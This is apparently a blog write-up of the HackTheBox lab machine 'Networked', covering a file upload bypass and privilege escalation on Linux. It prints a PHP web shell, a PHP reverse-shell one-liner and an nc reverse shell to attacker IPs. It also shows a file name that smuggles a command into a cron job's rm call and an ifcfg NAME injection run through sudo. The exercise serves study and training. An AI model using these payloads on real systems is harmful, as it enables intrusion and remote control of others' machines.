HackTheBox — Networked Writeup (OSCP Like)
Networked is an Medum level OSCP like linux machine on hackthebox.The challenging part is Reading the code in order to exploit it to get shell and also the privilege escalation part which was unusual and uncommon.
Enumeration
We find port 22 and 80 open.This is the default page
Lets find directories in the webpage hosted at port 80 using direarch. We find /uploads and /backup
lets visit backup
Seems like a zipped tar file.We confirm this by running the file command.Its a POSIX tar archive
Lets google how to unzip tar files and we find this in stackoverflow
COMMAND → tar xvf filename.tar
Once you have unpacked the backup file you will find 3–4 folders which are mainly source code for the pages. Lets visit photos.php
Lets visit upload.php, looks like we can upload files here and hopefully do some file upload bypass and execute commands.
Before uploading anything malicious I tried to upload a simple image file
And when i visit photos.php i can finally see the image i uploaded
I right click on the image and opened it in a new tab and was able to find its location.Seems like it is uploaded in /uploads folder
LETS TRY SOME FILE UPLOAD BYPASS! .I tried many ways and one of them was saving the reverse shell with a .png.php extension which tricks the webserver to believe that it is a png (image) file but then gets executed as php as it ends with .php
BONUS TIP: If you read the contents of upload.php file you can see which extensions are allowed.
Anyways lets intercept the request in burp and send the request to the repeater. In the body of the request, you will see some grabage values this is the data of the image.We will not remove it as it tricks the target to think that we are actually uploading an image. Now Go to the last line and add a php code.
<?php system($_GET[‘cmd’]); ?>
You can see that our file was uploaded successfully
Along with this, make sure to save the name of the file with the extension .png.php as you can see on the line 15.This will execute our file as php.
Lets visit photos.php and right click on our image and open it in a new tab
And we are able to see the data inside our image.These are garbage values
BONUS TIP: We could had avoided all this garbage.Instead of keeping the data of image before our php code we could had just put any magic bytes such as GIF87a which would had tricked the target to think that we are uploading a gif file.I’ll just show you an image of what i mean
IN the url,we use ?cmd=whoami this will run the whoami command
now scroll down and you will see apache which have highlighted in blue.SO we are apache user.
Lets replace whoami command with something more malicious like a php reverse shell.whch you can find on pentestmonkey
php -r ‘$sock=fsockopen(“10.0.0.1”,1234);exec(“/bin/sh -i <&3 >&3 2>&3”);’
MAKE SURE TO URL ENCODE IT ! (else it wont work)
?cmd=<paste your Url Encoded PHP Reverse Shell here>
and we finally get a shell.BY the way what i did via the url could also be done through burpsuite.
Lets transfer linpeas to the target
PRIVILEGE ESCALATION
OVERVIEW- Now this part requires that you know how to read code.Unfortunately i didn’t have much experience with reading php code.I would highly suggest you to refer ippsec’s video.The explanation i am going to provide for this part has been taken from Rana khalil’s writeup where it is well explained.(Credits-https://ranakhalil101.medium.com/hack-the-box-networked-writeup-w-o-metasploit-62daa1146b9b)
Apache > Guly
The user.txt flag is in the home directory of the user guly. So we’ll either have to escalate our privileges to guly or root.
I ran the LinEnum.sh and pspy64 programs but didn’t find anything unusual. I did notice that in the home directory of guly there’s a php script and a crontab file. We have read permission on both of them.
bash-4.2$ ls -la
total 28
drwxr-xr-x. 2 guly guly 159 Jul 9 2019 .
drwxr-xr-x. 3 root root 18 Jul 2 2019 ..
lrwxrwxrwx. 1 root root 9 Jul 2 2019 .bash_history -> /dev/null
-rw-r--r--. 1 guly guly 18 Oct 30 2018 .bash_logout
-rw-r--r--. 1 guly guly 193 Oct 30 2018 .bash_profile
-rw-r--r--. 1 guly guly 231 Oct 30 2018 .bashrc
-rw------- 1 guly guly 639 Jul 9 2019 .viminfo
-r--r--r--. 1 root root 782 Oct 30 2018 check_attack.php
-rw-r--r-- 1 root root 44 Oct 30 2018 crontab.guly
-r--------. 1 guly guly 33 Oct 30 2018 user.txtView the content of crontab.guly.
bash-4.2$ cat crontab.guly
*/3 * * * * php /home/guly/check_attack.phpIt’s running the file check_attack.php script every 3 minutes. If you’re not familiar with the crontab format, refer to the following link.
Let’s view the check_attack.php file.
<?php
require '/var/www/html/lib.php';
$path = '/var/www/html/uploads/';
$logpath = '/tmp/attack.log';
$to = 'guly';
$msg= '';
$headers = "X-Mailer: check_attack.php\r\n";$files = array();
$files = preg_grep('/^([^.])/', scandir($path));foreach ($files as $key => $value) {
$msg='';
if ($value == 'index.html') {
continue;
}
#echo "-------------\n";#print "check: $value\n";
list ($name,$ext) = getnameCheck($value);
$check = check_ip($name,$value);if (!($check[0])) {
echo "attack!\n";
# todo: attach file
file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);exec("rm -f $logpath");
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
echo "rm -f $path$value\n";
mail($to, $msg, $msg, $headers, "-F$value");
}
}?>The script is taking in all the files in the /var/www/html/uploads directory and running the getnameCheck() and check_ip() functions on it from the lib.php file.
function getnameCheck($filename) {
$pieces = explode('.',$filename);
$name= array_shift($pieces);
$name = str_replace('_','.',$name);
$ext = implode('.',$pieces);
#echo "name $name - ext $ext\n";
return array($name,$ext);
}function check_ip($prefix,$filename) {
//echo "prefix: $prefix - fname: $filename<br>\n";
$ret = true;
if (!(filter_var($prefix, FILTER_VALIDATE_IP))) {
$ret = false;
$msg = "4tt4ck on file ".$filename.": prefix is not a valid ip ";
} else {
$msg = $filename;
}
return array($ret,$msg);
}The getnameCheck() function simply separates the name of the file from the extension of the file. The check_ip() function checks if the filename is a valid IP address. If it is not, it will return false which will trigger the attack component in the check_attack.php file.
if (!($check[0])) {
echo "attack!\n";
# todo: attach file
file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);exec("rm -f $logpath");
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
echo "rm -f $path$value\n";
mail($to, $msg, $msg, $headers, "-F$value");
}This passes the path of the file to the exec() function and deletes it. Of course, no validation is being done on the input of the exec() function and so we can abuse it to escalate privileges.
Change to the /var/www/html/uploads directory and create the following file.
touch '; nc -c bash 10.10.14.12 3333'The “;” will end the “rm” command in the exec() function and run the nc command, which will send a reverse shell back to our machine.
Set up a listener to receive the reverse shell.
nc -nlvp 3333Wait for the cron job to run and we get a shell!
Convert the shell to a fully interactive shell and grab the user.txt flag.
Guly > Root (ifcfg privilege escalation)
We need to escalate our privileges to root. I downloaded the LinEnum script and ran it. It looks like we can run the following file as root without a password.
User guly may run the following commands on networked:
(root) NOPASSWD: /usr/local/sbin/changename.sh[+] Possible sudo pwnage!
/usr/local/sbin/changename.shView the permissions on the file.
[guly@networked ~]$ ls -la /usr/local/sbin | grep changename.sh
-rwxr-xr-x 1 root root 422 Jul 8 2019 changename.shWe only have read and execute permissions on the file. Let’s view the content of the file.
#!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
DEVICE=guly0
ONBOOT=no
NM_CONTROLLED=no
EoFregexp="^[a-zA-Z0-9_\ /-]+$"for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
echo "interface $var:"
read x
while [[ ! $x =~ $regexp ]]; do
echo "wrong input, try again"
echo "interface $var:"
read x
done
echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
done
/sbin/ifup guly0It takes in the content of the file ifcfg-guly and does a simple regex check on the input. Let’s view the permissions on that file.
[guly@networked ~]$ ls -la /etc/sysconfig/network-scripts/ | grep ifcfg-guly
-rw-r--r-- 1 root root 114 Jan 14 04:09 ifcfg-gulyWe can only read it. Let’s view the file.
DEVICE=guly0
ONBOOT=no
NM_CONTROLLED=no
NAME=ps /tmp/foo
PROXY_METHOD=asodih
BROWSER_ONLY=asdoih
BOOTPROTO=asdoihThe NAME is assigned a system command, so we can probably use this to escalate privileges. After a bit of googling, I found this bug report that states that incorrect whitespace filtering on the NAME attribute leads to code execution. Since we can run the changename.sh script with sudo privileges, it will prompt us to enter the NAME value and since it’s not properly validated, we can get a shell with root privileges! Here are some more resources about ifcfg privilege escalation.Its a very obscure method of priv esc.
As you can see above, we are prompted to provide input for NAME: filed where we can put anything and the a space follow by the command we want to run.In our example we have run bash
Grab the root.txt flag.
CONCLUSION
Honestly this machine was challenging(and is also rated Harder than oscp as per Tj null’s list) due to the requirement of reading code and the wierd method of privilege escalation however i found the priv esc method interesting as i had never seen it before.For more such writeups make sure to follow me here on Medium.Until next time…
